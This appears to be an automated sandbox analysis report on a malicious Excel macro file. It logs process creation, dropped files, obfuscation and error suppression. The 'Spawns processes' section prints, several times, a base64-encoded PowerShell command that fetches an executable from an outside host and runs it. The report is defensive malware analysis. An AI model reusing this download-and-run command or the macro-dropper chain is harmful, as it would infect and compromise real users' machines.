Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	Binary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSM@15/10@3/3

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MV TRIADES.xlsm

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0D5.tmp

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................x.............W.a.i.t.i.n.g. .f.o.r. .1.....l.......-t......................0...............H...............................			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............H.......J.......................			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................Ku......................e. .............H..........................s....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................xw......................e. .............H..........................s....			Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: MV TRIADES.xlsm	Virustotal: Detection: 44%
Source: MV TRIADES.xlsm	ReversingLabs: Detection: 42%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Document is a ZIP file with path names indicative of goodware

Source: MV TRIADES.xlsm	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: MV TRIADES.xlsm	Initial sample: OLE zip file path = xl/media/image2.png

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
Source:	Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp

Source: initial sample

Static PE information: 0x9FB74E9D [Sun Nov 29 18:42:37 2054 UTC]

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisWorkbook

Name: ThisWorkbook

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Code function: 11_2_00361C15 push ebx; iretd

11_2_00361C52

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\tNDFx.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
